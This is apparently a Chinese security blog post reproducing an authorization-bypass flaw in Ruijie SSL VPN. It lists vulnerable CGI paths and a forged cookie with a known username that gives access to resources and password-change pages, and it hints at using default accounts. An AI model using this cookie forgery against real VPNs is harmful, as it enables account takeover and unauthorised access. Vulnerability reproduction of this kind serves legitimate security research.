某 VPN 的垂直越权漏洞复现

地球胖头鱼 2021-03-02
Web安全 发布于 2021-03-02 13:55:08 阅读 165 评论 0

前言

Ruijie SSL VPN 存在垂直越权漏洞,攻击者在已知用户名的情况下,可以对账号进行修改密码和绑定手机操作。并且可以查看服务器资源,这里可能面临的难点是怎么获取用户名,其实这也是最简单的,在锐捷官网就会通知你他的默认用户名和密码是什么,作为一名甲方从业人员自然明白,默认账户的危害!所以你懂了吗?不懂我就凑字数告诉你,百度搜索锐捷VPN默认账户可以获取你想要的答案,反正我说了是凑字数的,不准怪我!

复现过程

在公网测试的小伙伴切记不要乱搞,因为警察叔叔可能会请你喝茶!

访问锐捷vpn页面如下

https://*.*.*.*/cgi-bin/installjava.cgi

漏洞利用

访问 https://**//cgi-bin/main.cgi?oper=getrsc ,并将请求的cookie改为下值,并且其中的UserName为已知用户名

Cookie:UserName=adm;   SessionId=1; FirstVist=1; Skin=1; tunnel=1

看到如下页面,证明利用成功

在参考过别人的文章后知道,当我们知道路径的情况下,可以访问主页面,然后主页面中可以修改账户参数等操作

https://******/cgi-bin/main.cgi?oper=tomain&showwhat=showres

配置页面,非授权资产谨慎操作哦,有风险!

https://*****/cgi-bin/main.cgi?oper=modpwd

##总结

我也是看了其他人的文章才总结出来的,很多还是不是很了解希望大家指出问题,感谢大家。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!